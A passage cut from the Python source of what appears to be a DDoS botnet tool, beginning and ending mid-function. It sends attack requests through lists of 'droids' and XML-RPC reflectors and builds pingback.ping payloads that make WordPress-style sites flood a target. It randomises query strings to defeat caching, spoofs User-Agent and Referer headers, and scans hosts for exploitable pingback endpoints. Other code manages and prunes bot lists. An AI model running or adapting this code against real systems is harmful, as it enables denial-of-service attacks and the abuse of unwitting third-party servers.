  3360. self.discard_droids.append(droid)
  3361. self.num_discard_droids = self.num_discard_droids + 1
  3362. droids = self.discarding_droids(droid, droids) # check if droid is failing for autobalance army
  3363. if not self.options.disablepurge:
  3364. if not droids: # return when not any working
  3365. self.options.disabledroids = True
  3366. return
  3367. shuffle(droids) # shuffle droids order, each discarding check :-)
  3368. for droid in droids:
  3369. name_droid = None
  3370. if "$TARGET" in droid: # replace droid/parameter for target
  3371. url = droid.replace("$TARGET", target)
  3372. t = urlparse(url)
  3373. name_droid = t.netloc
  3374. if name_droid == "":
  3375. name_droid = droid
  3376. print("[Info] [Droids] Attacking from: " + name_droid)
  3377. self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
  3378. headers = {'User-Agent' : self.user_agent, 'Content-type' : "application/x-www-form-urlencoded", 'Referer' : self.referer, 'Connection' : 'keep-alive'} # set fake headers
  3379. try:
  3380. if options.proxy: # set proxy
  3381. self.proxy_transport(options.proxy)
  3382. if self.options.timeout: # set timeout
  3383. try:
  3384. droid_timeout = int(self.options.timeout)
  3385. except:
  3386. droid_timeout = 5
  3387. else:
  3388. droid_timeout = 5
  3389. if droid_timeout < 1:
  3390. droid_timeout = 5
  3391. req = urllib.request.Request(url, None, headers)
  3392. rsp = urllib.request.urlopen(req, context=self.ctx, timeout=droid_timeout)
  3393. self.droids_hit = self.droids_hit + 1 # add hit to droids stats
  3394. except Exception:
  3395. print("[Info] [Droids] " + name_droid + " -> FAILED (cannot connect!)")
  3396. self.droids_fail = self.droids_fail + 1 # add fail to droids stats
  3397. if not self.options.disablepurge:
  3398. self.discard_droids.append(droid)
  3399. self.num_discard_droids = self.num_discard_droids + 1
  3400. else:
  3401. print("[Info] [Droids] " + str(droid) + " -> FAILED (invalid droid!)")
  3402. self.droids_fail = self.droids_fail + 1 # add fail to droids stats
  3403. if not self.options.disablepurge:
  3404. self.discard_droids.append(droid)
  3405. self.num_discard_droids = self.num_discard_droids + 1
  3406. if self.options.verbose:
  3407. if name_droid:
  3408. print("[Info] [AI] [Droids] "+str(name_droid)+" is returning...")
  3409. else:
  3410. print("[Info] [AI] [Droids] "+str(droid)+" is returning...")
  3411. if self.options.disablerpcs and self.options.disableucavs:
  3412. self.extra_zombies_lock = False # [ARMY] have finished
  3413. def extract_droids(self):
  3414. # extract droids from file
  3415. options = self.options
  3416. try:
  3417. f = open(self.droids_file)
  3418. droids = f.readlines()
  3419. droids = [ droid.replace('\n','') for droid in droids ]
  3420. f.close()
  3421. if not droids:
  3422. print("[Info] [AI] [Control] Cannot retrieve [Droids] from: 'botnet/droids.txt' -> [Discarding!]")
  3423. self.options.disabledroids = True
  3424. return
  3425. else:
  3426. return droids
  3427. except:
  3428. if os.path.exists(self.droids_file) == True:
  3429. print("[Info] [AI] [Control] Cannot open [Droids] from: 'botnet/droids.txt' -> [Discarding!]")
  3430. return #sys.exit(2)
  3431. else:
  3432. print("[Info] [AI] [Control] Cannot found [Droids] from: 'botnet/droids.txt' -> [Discarding!]")
  3433. return #sys.exit(2)
  3434. def discarding_rpcs(self, rpc, rpcs):
  3435. if rpc in self.discard_rpcs:
  3436. rpcs.remove(rpc)
  3437. if self.options.verbose:
  3438. print(("[Info] [AI] [Control] [X-RPCs] "+str(rpc)+" is not working! -> [Discarding!]"))
  3439. return rpcs
  3440. def send_rpcs(self, rpcs):
  3441. # extract vulnerable XML-RPC pingback services and perform requests against target
  3442. time.sleep(4) # aiming (multi-threading flow time compensation)
  3443. if not self.options.disablepurge:
  3444. if not rpcs: # return when not any working
  3445. self.options.disablerpcs = True
  3446. return
  3447. target = self.options.target
  3448. options = self.options
  3449. def random_key(length):
  3450. key = ''
  3451. for i in range(length):
  3452. key += random.choice(string.ascii_lowercase + string.ascii_uppercase + string.digits)
  3453. return key
  3454. shuffle(rpcs) # shuffle rpcs
  3455. if not self.options.disablepurge:
  3456. for rpc in rpcs:
  3457. if not rpc.startswith('http'): # discarded inmediately
  3458. if not self.options.disablepurge:
  3459. self.discard_rpcs.append(rpc)
  3460. self.num_discard_rpcs = self.num_discard_rpcs + 1
  3461. self.rpcs_fail = self.rpcs_fail + 1 # add rpc fail to stats
  3462. rpcs = self.discarding_rpcs(rpc, rpcs) # check if rpc is failing for autobalance army
  3463. if not self.options.disablepurge:
  3464. if not rpcs: # return when not any working
  3465. self.options.disablerpcs = True
  3466. return
  3467. shuffle(rpcs) # shuffle rpcs order, each discarding check :-)
  3468. for rpc in rpcs:
  3469. t = urlparse(rpc)
  3470. name_rpc = t.netloc
  3471. if name_rpc == "":
  3472. name_rpc = rpc
  3473. print("[Info] [X-RPCs] Attacking from: " + name_rpc)
  3474. self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
  3475. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
  3476. key = random_key(8) # generate random value page to bypass cache
  3477. rpc_page = "?" + str(key)
  3478. key = random_key(6) # re-generate random value id to bypass cache
  3479. rpc_id = "=" + str(key)
  3480. target_place = target + rpc_page + rpc_id # random place to bypass cache (ex: www.target.com?U7OvBdp1=4lMcNj)
  3481. if "/xmlrpc.php" in rpc:
  3482. rpc_place = rpc.replace("xmlrpc.php", "")
  3483. rpc_exploit = "<methodCall><methodName>pingback.ping</methodName><params><param><value><string>"+target_place+"</string></value></param><param><value><string>"+rpc_place+"</string></value></param></params></methodCall>"
  3484. try:
  3485. if options.proxy: # set proxy
  3486. self.proxy_transport(options.proxy)
  3487. if self.options.timeout: # set timeout
  3488. try:
  3489. rpc_timeout = int(self.options.timeout)
  3490. except:
  3491. rpc_timeout = 5
  3492. else:
  3493. rpc_timeout = 5
  3494. if rpc_timeout < 1:
  3495. rpc_timeout = 5
  3496. req = urllib.request.Request(rpc, rpc_exploit.encode('utf-8'), headers)
  3497. urllib.request.urlopen(req, context=self.ctx, timeout=rpc_timeout)
  3498. self.rpcs_hit = self.rpcs_hit + 1 # add rpc hit to stats
  3499. if self.options.verbose:
  3500. print("[Info] [X-RPCs] Reply:", target_reply)
  3501. except:
  3502. print("[Info] [X-RPCs] " + name_rpc + " -> FAILED (cannot connect!)")
  3503. self.rpcs_fail = self.rpcs_fail + 1 # add rpc fail to stats
  3504. if not self.options.disablepurge:
  3505. self.discard_rpcs.append(rpc)
  3506. self.num_discard_rpcs = self.num_discard_rpcs + 1
  3507. else:
  3508. print("[Info] [X-RPCs] " + name_rpc + " -> FAILED (invalid X-RPC!)")
  3509. self.rpcs_fail = self.rpcs_fail + 1 # add rpc fail to stats
  3510. if not self.options.disablepurge:
  3511. self.discard_rpcs.append(rpc)
  3512. self.num_discard_rpcs = self.num_discard_rpcs + 1
  3513. if self.options.verbose:
  3514. print("[Info] [AI] [X-RPCs] "+str(name_rpc)+" is returning...")
  3515. if self.options.disableucavs:
  3516. self.extra_zombies_lock = False # [ARMY] have finished
  3517. def extract_rpcs(self):
  3518. # extract rpcs from file
  3519. options = self.options
  3520. try:
  3521. f = open(self.rpcs_file)
  3522. rpcs = f.readlines()
  3523. rpcs = [ rpc.replace('\r','') for rpc in rpcs ]
  3524. rpcs = [ rpc.replace('\n','') for rpc in rpcs ]
  3525. f.close()
  3526. if not rpcs:
  3527. print("[Info] [AI] [Control] Cannot retrieve [X-RPCs] from: 'botnet/rpcs.txt' -> [Discarding!]")
  3528. self.options.disablerpcs = True
  3529. return
  3530. else:
  3531. return rpcs
  3532. except:
  3533. if os.path.exists(self.rpcs_file) == True:
  3534. print("[Info] [AI] [Control] Cannot open [X-RPCs] from: 'botnet/rpcs.txt' -> [Discarding!]")
  3535. return
  3536. else:
  3537. print("[Info] [AI] [Control] Cannot found [X-RPCs] from: 'botnet/rpcs.txt' [Discarding!]")
  3538. return
  3539. def extract_ntps(self):
  3540. # extract ntps from file
  3541. options = self.options
  3542. try:
  3543. f = open(self.ntps_file)
  3544. ntps = f.readlines()
  3545. ntps = [ ntp.replace('\r','') for ntp in ntps ]
  3546. ntps = [ ntp.replace('\n','') for ntp in ntps ]
  3547. f.close()
  3548. if not ntps:
  3549. print("[Info] [AI] [Control] Cannot retrieve [NTPs] from: 'botnet/ntps.txt' -> [Discarding!]")
  3550. return
  3551. else:
  3552. return ntps
  3553. except:
  3554. if os.path.exists(self.ntps_file) == True:
  3555. print("[Info] [AI] [Control] Cannot open [NTPs] from: 'botnet/ntps.txt' -> [Discarding!]")
  3556. return
  3557. else:
  3558. print("[Info] [AI] [Control] Cannot found [NTPs] from: 'botnet/ntps.txt' [Discarding!]")
  3559. return
  3560. def extract_dnss(self):
  3561. # extract dnss from file
  3562. options = self.options
  3563. try:
  3564. f = open(self.dnss_file)
  3565. dnss = f.readlines()
  3566. dnss = [ dns.replace('\r','') for dns in dnss ]
  3567. dnss = [ dns.replace('\n','') for dns in dnss ]
  3568. f.close()
  3569. if not dnss:
  3570. print("[Info] [AI] [Control] Cannot retrieve [DNSs] from: 'botnet/dnss.txt' -> [Discarding!]")
  3571. return
  3572. else:
  3573. return dnss
  3574. except:
  3575. if os.path.exists(self.dnss_file) == True:
  3576. print("[Info] [AI] [Control] Cannot open [DNSs] from: 'botnet/dnss.txt' -> [Discarding!]")
  3577. return
  3578. else:
  3579. print("[Info] [AI] [Control] Cannot found [DNSs] from: 'botnet/dnss.txt' [Discarding!]")
  3580. return
  3581. def extract_zombies(self):
  3582. options = self.options
  3583. if self.options.test:
  3584. try:
  3585. f = open(options.test)
  3586. zombies = f.readlines()
  3587. zombies = [ zombie.replace('\n','') for zombie in zombies ]
  3588. f.close()
  3589. if not zombies:
  3590. print("\n[Error] [AI] [Control] Cannot retrieve [Zombies] from: 'botnet/zombies.txt' -> [Aborting!]\n")
  3591. return
  3592. else:
  3593. return zombies
  3594. except:
  3595. if os.path.exists(options.test) == True:
  3596. print("\n[Error [AI] [Control] Cannot open [Zombies] from: 'botnet/zombies.txt' -> [Aborting!]\n")
  3597. return #sys.exit(2)
  3598. else:
  3599. print("\n[Error] [AI] [Control] Cannot found [Zombies] from: 'botnet/zombies.txt' -> [Aborting!]\n")
  3600. return #sys.exit(2)
  3601. else:
  3602. try:
  3603. f = open(self.zombies_file)
  3604. zombies = f.readlines()
  3605. zombies = [ zombie.replace('\n','') for zombie in zombies ]
  3606. f.close()
  3607. if not zombies:
  3608. print("\n[Error] [AI] You haven't [Zombies] to be extracted from: 'botnet/zombies.txt' -> [Aborting!]\n")
  3609. return
  3610. else:
  3611. return zombies
  3612. except:
  3613. if os.path.exists(self.zombies_file) == True:
  3614. print("\n[Error] [AI] [Control] Cannot open [Zombies] from: 'botnet/zombies.txt' -> [Aborting!]\n")
  3615. return #sys.exit(2)
  3616. else:
  3617. print("\n[Error] [AI] [Control] Cannot found [Zombies] from: 'botnet/zombies.txt' -> [Aborting!]\n")
  3618. return #sys.exit(2)
  3619. def extract_target_list(self):
  3620. options = self.options
  3621. try:
  3622. f = open(options.target_list)
  3623. targets = f.readlines()
  3624. targets = [ target.replace('\n','') for target in targets ]
  3625. f.close()
  3626. if not targets:
  3627. print("\n[Error] [AI] [Control] Cannot retrieve [Targets] from: '"+options.target_list+"' -> [Aborting!]\n")
  3628. return
  3629. else:
  3630. return targets
  3631. except:
  3632. if os.path.exists(options.target_list) == True:
  3633. print("\n[Error] [AI] [Control] Cannot found [Targets] from: '"+options.target_list+"' -> [Aborting!]\n")
  3634. return #sys.exit(2)
  3635. else:
  3636. print("\n[Error] [AI] [Control] Cannot open [Targets] from: '"+options.target_list+"' -> [Aborting!]\n")
  3637. return #sys.exit(2)
  3638. def update_zombies(self, zombies_ready):
  3639. # update zombies on file
  3640. options = self.options
  3641. if options.attackme:
  3642. f = open(self.zombies_file, "w") # re-write list
  3643. for zombie in self.doll.real_zombies: # add only alien verified zombies
  3644. for x in zombie:
  3645. f.write(str(x) + os.linesep)
  3646. f.close()
  3647. if options.test or options.testall:
  3648. if not options.test:
  3649. options.test = self.zombies_file
  3650. f = open(options.test, "w") # re-write list only with zombies ready
  3651. for zombie in zombies_ready:
  3652. f.write(zombie + os.linesep)
  3653. f.close()
  3654. if options.search or options.dorks or options.autosearch or options.download or options.download_github: # append only new zombies to list (dorking supported)
  3655. f = open(self.zombies_file)
  3656. zombies_on_file = f.read().splitlines()
  3657. with open(self.zombies_file, "a") as zombie_list:
  3658. for zombie in zombies_ready:
  3659. if zombie not in zombies_on_file: # parse possible repetitions
  3660. zombie_list.write(zombie + os.linesep)
  3661. if options.download or options.download_github:
  3662. self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole)
  3663. else:
  3664. self.scanned_zombies = self.scanned_zombies + 1 # update scanner stats only with new zombies (dorking)
  3665. f.close()
  3666. def update_aliens(self, aliens_ready):
  3667. # update aliens on file
  3668. options = self.options
  3669. if options.download or options.download_github: # append only new aliens to list
  3670. f = open(self.aliens_file)
  3671. aliens_on_file = f.read().splitlines()
  3672. with open(self.aliens_file, "a") as alien_list:
  3673. for alien in aliens_ready:
  3674. if alien not in aliens_on_file: # parse possible repetitions
  3675. alien_list.write(alien + os.linesep)
  3676. self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole)
  3677. f.close()
  3678. def update_droids(self, droids_ready):
  3679. # update droids on file
  3680. options = self.options
  3681. if options.download or options.download_github: # append only new droids to list
  3682. f = open(self.droids_file)
  3683. droids_on_file = f.read().splitlines()
  3684. with open(self.droids_file, "a") as droid_list:
  3685. for droid in droids_ready:
  3686. if droid not in droids_on_file: # parse possible repetitions
  3687. droid_list.write(droid + os.linesep)
  3688. self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole)
  3689. f.close()
  3690. def update_ucavs(self, ucavs_ready):
  3691. # update ucavs on file
  3692. options = self.options
  3693. if options.download or options.download_github: # append only new ucavs to list
  3694. f = open(self.ucavs_file)
  3695. ucavs_on_file = f.read().splitlines()
  3696. with open(self.ucavs_file, "a") as ucav_list:
  3697. for ucav in ucavs_ready:
  3698. if ucav not in ucavs_on_file: # parse possible repetitions
  3699. ucav_list.write(ucav + os.linesep)
  3700. self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole)
  3701. f.close()
  3702. def update_rpcs(self, rpcs_ready):
  3703. # update rpcs on file
  3704. options = self.options
  3705. if options.testrpc or options.testall:
  3706. f = open(self.rpcs_file, "w") # re-write list
  3707. for rpc in rpcs_ready: # add only rpc verified zombies
  3708. f.write(rpc + os.linesep)
  3709. f.close()
  3710. if options.download or options.download_github: # append only new rpcs to list
  3711. f = open(self.rpcs_file)
  3712. rpcs_on_file = f.read().splitlines()
  3713. with open(self.rpcs_file, "a") as rpc_list:
  3714. for rpc in rpcs_ready:
  3715. if rpc not in rpcs_on_file: # parse possible repetitions
  3716. rpc_list.write(rpc + os.linesep)
  3717. self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole)
  3718. f.close()
  3719. def update_dnss(self, dnss_ready):
  3720. # update dns on file
  3721. options = self.options
  3722. if options.download or options.download_github: # append only new dns to list
  3723. f = open(self.dnss_file)
  3724. dnss_on_file = f.read().splitlines()
  3725. with open(self.dnss_file, "a") as dns_list:
  3726. for dns in dnss_ready:
  3727. if dns not in dnss_on_file: # parse possible repetitions
  3728. dns_list.write(dns + os.linesep)
  3729. self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole)
  3730. f.close()
  3731. def update_ntps(self, ntps_ready):
  3732. # update ntps on file
  3733. options = self.options
  3734. if options.download or options.download_github: # append only new ntps to list
  3735. f = open(self.ntps_file)
  3736. ntps_on_file = f.read().splitlines()
  3737. with open(self.ntps_file, "a") as ntp_list:
  3738. for ntp in ntps_ready:
  3739. if ntp not in ntps_on_file: # parse possible repetitions
  3740. ntp_list.write(ntp + os.linesep)
  3741. self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole)
  3742. f.close()
  3743. def search_rpc(self, rpc_host):
  3744. options = self.options
  3745. rpc_vulnerable = False
  3746. rpc_pingback_url = False
  3747. self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
  3748. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
  3749. try:
  3750. if self.options.testall: # testing_all
  3751. if options.proxy: # set proxy
  3752. self.proxy_transport(options.proxy)
  3753. req = urllib.request.Request(rpc_host, None, headers)
  3754. rpc_code = urllib.request.urlopen(req, context=self.ctx).read().decode('utf-8')
  3755. rpc_links = re.findall('"((http|ftp)s?://.*?)"', rpc_code)
  3756. for link in rpc_links:
  3757. if 'xmlrpc.php' in link[0] and not "rsd" in link[0]: # extract rpc server url (discarding 'rsd' url)
  3758. rpc_pingback_url = link[0]
  3759. rpc_vulnerable = True
  3760. break # found it!
  3761. else: # not any XML-RPC discovering methods are working
  3762. rpc_pingback_url = rpc_host + "/xmlrpc.php"
  3763. rpc_vulnerable = False
  3764. else:
  3765. if rpc_host.startswith("http://"):
  3766. rpc_host = rpc_host.replace("http://", "")
  3767. if rpc_host.startswith("https://"):
  3768. rpc_host = rpc_host.replace("https://", "")
  3769. rpc_host = urlparse(rpc_host)
  3770. rpc_path = rpc_host.path.replace("\r", "")
  3771. self.head = True # send HTTP HEAD request searching for: X-Pingback
  3772. reply = self.connect_zombie(rpc_path)
  3773. self.head = False
  3774. if "X-Pingback" in reply: # discovering pingback-enabled resources
  3775. m = re.search('X-Pingback: (.+?)\n', reply) # regex magics
  3776. rpc_pingback_url = m.group(1) # extract rpc server url
  3777. rpc_vulnerable = True
  3778. else: # not X-Pingback on HTTP Headers (search for <link rel="pingback"... on HTML/XHTML code)
  3779. if options.proxy: # set proxy
  3780. self.proxy_transport(options.proxy)
  3781. req_rpc = urllib.request.Request(rpc_host, None, headers)
  3782. req_rpc.get_method = lambda : 'GET'
  3783. rpc_code = urllib.request.urlopen(req_rpc, context=self.ctx).read().decode('utf-8')
  3784. rpc_links = re.findall('"((http|ftp)s?://.*?)"', rpc_code)
  3785. for link in rpc_links:
  3786. if 'xmlrpc.php' in link[0] and not "rsd" in link[0]: # extract rpc server url (discarding 'rsd' url)
  3787. rpc_pingback_url = link[0]
  3788. rpc_vulnerable = True
  3789. break # found it!
  3790. else: # not any XML-RPC discovering methods are working
  3791. rpc_pingback_url = rpc_host + "/xmlrpc.php"
  3792. rpc_vulnerable = False
  3793. except: # something wrong discovering XML-RPC Pingback
  3794. pass
  3795. return rpc_vulnerable, rpc_pingback_url
  3796. def testing_offline(self):
  3797. # check for zombies offline
  3798. print ("\n[Info] [AI] Checking (sending HTTP HEAD requests) for [Zombies] offline...\n")
  3799. print('='*35)
  3800. zombies_online = 0
  3801. zombies_offline = 0
  3802. zombies = self.extract_zombies()
  3803. rpcs = self.extract_rpcs()
  3804. aliens = self.extract_aliens()
  3805. droids = self.extract_droids()
  3806. ucavs = self.extract_ucavs()
  3807. try:
  3808. botnet = zombies + rpcs + aliens + droids + ucavs
  3809. except:
  3810. return
  3811. discarded = [] # for discarded zombies
  3812. if not botnet:
  3813. return
  3814. self.head = True
  3815. for zombie in botnet:
  3816. zombie = str(zombie)
  3817. if zombie in zombies: # set zombie type (this way because cannot be same zombie with different type)
  3818. zombie_type = 'Zombie'
  3819. elif zombie in rpcs:
  3820. zombie_type = 'XML-RPC'
  3821. elif zombie in aliens:
  3822. zombie_type = 'Alien'
  3823. elif zombie in droids:
  3824. zombie_type = 'Droid'
  3825. elif zombie in ucavs:
  3826. zombie_type = 'UCAV'
  3827. t = urlparse(zombie)
  3828. name_zombie = t.netloc
  3829. if name_zombie == "":
  3830. name_zombie = zombie
  3831. if zombie_type == 'Alien': # [Aliens] are made with keyword ;$POST;
  3832. sep = ';$POST;'
  3833. zombie = zombie.split(sep, 1)[0]
  3834. try:
  3835. reply = str(self.connect_zombie(zombie))
  3836. except:
  3837. reply = None
  3838. if reply:
  3839. if reply == "200" or reply == "301" or reply == "302":
  3840. status = "ONLINE! -> [OK!]"
  3841. else:
  3842. status = "ONLINE! -> [BUT replying an INVALID HTTP CODE]"
  3843. zombies_online = zombies_online + 1
  3844. else:
  3845. status = "NOT Working!"
  3846. zombies_offline = zombies_offline + 1
  3847. print("\nName:", name_zombie)
  3848. print("Type: [", zombie_type, "]")
  3849. print("Vector:", zombie)
  3850. print("HTTP Code: [", reply, "]")
  3851. print("STATUS:", status)
  3852. print('-'*21)
  3853. if status == "NOT Working!": # add to discarded zombies
  3854. if zombie not in discarded:
  3855. discarded.append(zombie)
  3856. print("\n" + '='*52)
  3857. print("\n+ Total Botnet:", len(botnet))
  3858. print("\n" + '-'*25 + "\n")
  3859. print(" - ONLINE:", zombies_online)
  3860. print(" - OFFLINE:", zombies_offline, "\n")
  3861. print('='*52 + '\n')
  3862. self.head = False
  3863. if zombies_offline > 0:
  3864. if not self.options.forceyes:
  3865. test_reply = input("[AI] Do you want to update your army? (Y/n)\n")
  3866. print('-'*25 + "\n")
  3867. else:
  3868. test_reply = "Y"
  3869. if test_reply == "n" or test_reply == "N":
  3870. print("[AI] "+self.exit_msg+"\n")
  3871. return
  3872. else:
  3873. disc_zombies = self.discard_zombies(discarded) # discard zombies (remove from files)
  3874. print('='*52)
  3875. print("\n - DISCARDED:", disc_zombies)
  3876. new_botnet = int(len(botnet) - disc_zombies)
  3877. print("\n+ New Total Botnet:", str(new_botnet), "\n")
  3878. print('='*52 + '\n')
  3879. else:
  3880. print("[Info] [AI] [Control] ALL checked [Zombies] are ONLINE! -> [Exiting!]\n")
  3881. def send_extra_zombies(self):
  3882. # check for extra zombies: aliens, droids, rpcs, ucavs... and start attacking with them
  3883. if not self.options.disablealiens and not self.options.attackme: # different layers requests -> pure web abuse
  3884. if self.options.verbose:
  3885. print("[Info] [AI] [Control] Deploying [Aliens] with heavy 'laser-cannon' weapons...")
  3886. aliens = [self.extract_aliens()] # extract aliens from file to a list
  3887. for a in aliens:
  3888. if a is None:
  3889. self.options.disablealiens = True
  3890. self.total_aliens = 0 # not any alien invoked
  3891. else:
  3892. for s in a: # extract number of aliens
  3893. self.total_aliens = self.total_aliens + 1
  3894. al = threading.Thread(target=self.send_aliens, args=(aliens)) # multithreading to send aliens
  3895. al.start()
  3896. else:
  3897. self.options.disablealiens = True
  3898. self.total_aliens = 0 # not any alien invoked
  3899. if not self.options.disabledroids and not self.options.attackme: # GET (with parameter required) requests
  3900. if self.options.verbose:
  3901. print("[Info] [AI] [Control] Deploying [Droids] with light 'laser-cannon' weapons...")
  3902. droids = [self.extract_droids()] # extract droids from file to a list
  3903. for d in droids:
  3904. if d is None:
  3905. self.options.disabledroids = True
  3906. self.total_droids = 0 # not any droid invoked
  3907. else:
  3908. for s in d: # extract number of droids
  3909. self.total_droids = self.total_droids + 1
  3910. dr = threading.Thread(target=self.send_droids, args=(droids)) # multithreading to send droids
  3911. dr.start()
  3912. else:
  3913. self.options.disabledroids = True
  3914. self.total_droids = 0 # not any droid invoked
  3915. if not self.options.disablerpcs and not self.options.attackme: # exploit XML-RPC pingback vulnerability
  3916. if self.options.verbose:
  3917. print("[Info] [AI] [Control] Deploying [X-RPCs] with 'plasma cannon' weapons...")
  3918. rpcs = [self.extract_rpcs()] # extract rpcs from file to a list
  3919. for r in rpcs:
  3920. if r is None:
  3921. self.options.disablerpcs = True
  3922. self.total_rpcs = 0 # not any rpc invoked
  3923. else:
  3924. for s in r: # extract number of rpcs
  3925. self.total_rpcs = self.total_rpcs + 1
  3926. rp = threading.Thread(target=self.send_rpcs, args=(rpcs)) # multithreading to send rpcs
  3927. rp.start()
  3928. else:
  3929. self.options.disablerpcs = True
  3930. self.total_rpcs = 0 # not any rpcs invoked
  3931. if not self.options.disableucavs and not self.options.attackme: # perform an external 'Is target up?' round check
  3932. if self.options.verbose:
  3933. print("[Info] [AI] [Control] Deploying [UCAVs] with 'heat-beam' weapons and 'status check' scanners...")
  3934. ucavs = [self.extract_ucavs()] # extract ucavs from file to a list
  3935. for u in ucavs:
  3936. if u is None:
  3937. self.options.disableucavs = True
  3938. self.total_ucavs = 0 # not any ucav invoked
  3939. else:
  3940. for s in u: # extract number of ucavs
  3941. self.total_ucavs = self.total_ucavs + 1
  3942. uc = threading.Thread(target=self.send_ucavs, args=(ucavs)) # multithreading to send ucavs
  3943. uc.start()
  3944. else:
  3945. self.options.disableucavs = True
  3946. self.total_ucavs = 0 # not any ucavs invoked
  3947. def abandoning_zombies(self):
  3948. if self.options.expire: # set timing for purge
  3949. try:
  3950. timing = int(self.options.expire)
  3951. except:
  3952. timing = self.expire_timing # default timing for purge
  3953. else:
  3954. timing = self.expire_timing # default timing for purge
  3955. if timing < 1:
  3956. timing = self.expire_timing # default timing for purge
  3957. zombies_arrival_timing = timing # timing = trying to control round time for threading flow
  3958. zombies_lock = 0
  3959. if self.options.verbose:
  3960. print("[Info] [AI] [Control] Setting ["+str(zombies_arrival_timing)+"] per round for [Zombies] to return...")
  3961. while self.herd.no_more_zombies() == False: # abandoning -controller- zombies
  3962. zombies_lock = zombies_lock + 1
  3963. if zombies_lock > zombies_arrival_timing: # execute main abandoning routine!
  3964. if self.options.verbose:
  3965. print("\n[Info] [AI] [Control] Return time set [~"+str(zombies_arrival_timing)+"] for [Zombies] is over! -> [Expiring!]")
  3966. break
  3967. else:
  3968. time.sleep(1)
  3969. def discard_zombies(self, discarded):
  3970. disc_zombies = 0
  3971. if self.options.testoffline:
  3972. zombies_list = [self.zombies_file, self.aliens_file, self.droids_file, self.ucavs_file, self.rpcs_file]
  3973. else:
  3974. zombies_list = [self.zombies_file]
  3975. if not self.options.disablealiens: # add aliens
  3976. zombies_list.append(self.aliens_file)
  3977. if not self.options.disabledroids: # add droids
  3978. zombies_list.append(self.droids_file)
  3979. if not self.options.disablerpcs: # add rpcs
  3980. zombies_list.append(self.rpcs_file)
  3981. if not self.options.disableucavs: # add ucavs
  3982. zombies_list.append(self.ucavs_file)
  3983. for l in zombies_list:
  3984. f = open(l, "r+")
  3985. d = f.readlines()
  3986. f.close()
  3987. f = open(l, "w")
  3988. disc_zombies = self.remove_discarded_zombies(f, d, discarded, disc_zombies)
  3989. f.close()
  3990. return disc_zombies
  3991. def remove_discarded_zombies(self, f, d, discarded, disc_zombies):
  3992. m = []
  3993. for zombie in d:
  3994. if zombie not in discarded == True:
  3995. m.append(zombie) # save it
  3996. else:
  3997. disc_zombies = disc_zombies + 1
  3998. if not m:
  3999. f.write("")
  4000. else:
  4001. for z in m:
  4002. f.write(z+os.linesep)
  4003. return disc_zombies
  4004. def parse_url_encoding(self, target):
  4005. t = urlparse(target)
  4006. host = urllib.parse.quote(t.netloc.encode('utf-8'))
  4007. path = urllib.parse.quote(t.path.encode('utf-8'))
  4008. query = urllib.parse.quote(t.query.encode('utf-8'))
  4009. if query:
  4010. if path.endswith(""):
  4011. path.replace("", "/")
  4012. query = urllib.parse.quote(t.query.encode('utf-8'))
  4013. target = t.scheme+"://"+host + path + "?" + query
  4014. else:
  4015. target = t.scheme+"://"+host + path
  4016. return target
  4017. def testing_rpcs(self, rpcs):
  4018. # discover/test XML-RPC Pingback vulnerabilities on webapps (Wordpress, Drupal, PostNuke, b2evolution,
  4019. # Xoops, PHPGroupWare, TikiWiki, etc...) and update list
  4020. options = self.options
  4021. if self.options.testall: #testing_all
  4022. print('='*51)
  4023. print ("Are 'plasma' reflectors ready? :-) (XML-RPC 'Pingback' Vulnerability Check):")
  4024. print('='*51)
  4025. num_active_rpcs = 0
  4026. num_failed_rpcs = 0
  4027. rpcs_ready = []
  4028. print("Trying:", len(rpcs))
  4029. print('-'*21)
  4030. for rpc in rpcs:
  4031. self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
  4032. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
  4033. if rpc.startswith("http://") or rpc.startswith("https://"):
  4034. print("[Info] [X-RPCs] Exploiting 'X-Pingback' at:", rpc)
  4035. rpc_host = rpc.replace("/xmlrpc.php", "")
  4036. rpc_vulnerable, rpc_pingback_url = self.search_rpc(rpc_host)
  4037. if rpc_vulnerable == True: # discover XML-RPC system.listMethods allowed
  4038. rpc_methods = "<methodCall><methodName>system.listMethods</methodName><params></params></methodCall>"
  4039. try:
  4040. if options.proxy: # set proxy
  4041. self.proxy_transport(options.proxy)
  4042. try:
  4043. req = urllib.request.Request(rpc_pingback_url, rpc_methods.encode('utf-8'), headers)
  4044. target_reply = urllib.request.urlopen(req, context=self.ctx).read().decode('utf-8')
  4045. except:
  4046. if DEBUG == True:
  4047. traceback.print_exc()
  4048. if self.options.verbose:
  4049. print("[Info] [X-RPCs] Reply:", target_reply)
  4050. if "pingback.ping" in target_reply: # XML-RPC pingback.ping method is allowed!
  4051. print("[Info] [AI] -> [VULNERABLE!]")
  4052. rpcs_ready.append(rpc_pingback_url) # save XML-RPC path as RPC zombie
  4053. num_active_rpcs = num_active_rpcs + 1 # add fail to rpcs stats
  4054. else:
  4055. print("[Info] [AI] -> [NOT vulnerable...]")
  4056. num_failed_rpcs = num_failed_rpcs + 1 # add fail to rpcs stats
  4057. except:
  4058. print("[Info] [AI] -> [NOT vulnerable...]")
  4059. num_failed_rpcs = num_failed_rpcs + 1 # add fail to rpcs stats
  4060. else:
  4061. print("[Info] [AI] -> [NOT vulnerable...]")
  4062. num_failed_rpcs = num_failed_rpcs + 1 # add fail to rpcs stats
  4063. print('-'*21)
  4064. print('='*18)
  4065. print("OK:", num_active_rpcs, "Fail:", num_failed_rpcs)
  4066. print('='*18)
  4067. if self.options.testall: # testing_all
  4068. return rpcs_ready, num_active_rpcs, num_failed_rpcs
  4069. else:
  4070. # update 'rpcs' list
  4071. if num_active_rpcs == 0:
  4072. print("\n[Info] [X-RPCs] Not any vulnerable 'XML-RPC' active!\n")
  4073. return
  4074. else:
  4075. if not self.options.forceyes:
